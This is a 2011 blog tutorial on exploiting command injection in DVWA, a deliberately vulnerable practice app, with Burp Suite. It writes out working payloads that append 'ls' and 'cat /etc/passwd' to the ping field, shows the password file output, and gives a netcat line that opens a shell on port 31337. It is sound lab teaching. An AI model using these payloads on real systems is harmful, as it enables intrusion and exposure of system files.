September 3, 2011

Command Execution on DVWA

So, the other day, I started delving into webappsec and I hit a bummer very soon and hence this post.
Getting started in webappsec is not that hard actually, there are tons of resources for that, just Google it.
I think the best way to learn something is by doing it actually. There are many "vulnerable by design" distros and live sites to practice web application hacking.
In this post I am going to write about DVWA and Command Execution vulnerability which is present in it and how to exploit it.
This being the first post regarding DVWA, I will start with the setup and tools required for this part. Lets get started!



Web security dojo
It is a complete distro for web application hackers. It contains various security testing tools and vulnerable web applications built in it so as to provide a complete testing environment for you.
You can visit the homepage here
And download it from here

Damn Vulnerable Web Application
As the name suggests, it is a damn vulnerable web application. You get all top 10 OWASP vulnerabilities in this package for your exploitation pleasure but no prizes for getting a shell because it is designed for that purpose ;)
I am using web security dojo which has DVWA already  installed along with other vulnerable webapps, so no need of downloading.
If you want to download and have it set up yourself, you can go ahead and get it from here.

Burp suite
It is an integrated platform for performing security testing of web applications. Agian, I am using this tool off the 'dojo'.
Dowload and more: Burp Suite

Figure out how to start DVWA and burp. And how to have burp intercepting all the traffic between your browser and the web application. Its really easy ;)

That's all we need for this part. Lets get started with Command Execution


Command Execution is a technique used via a web interface in order to execute OS commands on the web server.
Go to the command execution page. We are greeted with a text box and a submit button of a ping for free utility.












Enter an IP address and click on submit. The request will be intercepted by burp.











So, the app is sending IP address provided by us and then calling the submit function.
Next, try providing input as 127.0.0.1 & ls hoping it to be this easy but you will be welcomed by this screen as a result:












Try as many variations as possible to provide a command to execute. You will see this every time!

Well, that is a bummer! Any modification to IP address is being caught as invalid! And they said it is an easy demo!
After looking carefully, you will see that the security is set to high as shown in the 2nd screenshot.
Let's get introduced to DVWA security then...
DVWA security
DVWA comes with a very nice feature which lets you control the security of web app and it is set to high as default after installation. This feature lets you try your skills against low to highly secured environments. According to documentation high security mode is secure against all vulnerabilities and it shows good programming practices. There is a link on each page which shows the source code of each mode and you can compare secure and insecure practices. Very nice, now change it to low and let us try again...

After you enter an IP and the request is intercepted by burp, we will modify it on the fly in forward it to the app to see its response.
To modify a request on the fly, open the burp suite and go to the raw request captured as we have seen earlier. You can place the cursor at the end of IP address and change the content there. We want to add some command to it and we want it to be encoded. Right click in the window and choose 'URL-encode as you type' option.
I provided 127.0.0.1[space]&[space]ls&security as input, it should look like this











forward this request and return to the browser.
Yay! It is successful!


help
index.php
source
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.008 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.007 ms
That is the directory listing we have been waiting for! So this was this easy after all! After you see successful command execution do a victory dance and return to your desk. We can do so much with this!
send in cat /etc/passwd
ip=127.0.0.0+cat+/etc/passwd
we get:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
<<snip>>
Or read web.config file or have a shell..??
ip=127.0.0.1+nc+-l+-p+31337+-e+/bin/sh&submit=submit

Connect to port 31337 and enjoy :)

It was really a basic thing but I have done a huge post, hope my blog will get some hits ;)



2 comments:

  1. Nice work mate, I have become increasingly interested in web app security (seeing as XSS is the most common vulnerability). keep posting :)

    ReplyDelete
  2. I like this creative work. This is very useful app for the purpose of security. custom web application development

    ReplyDelete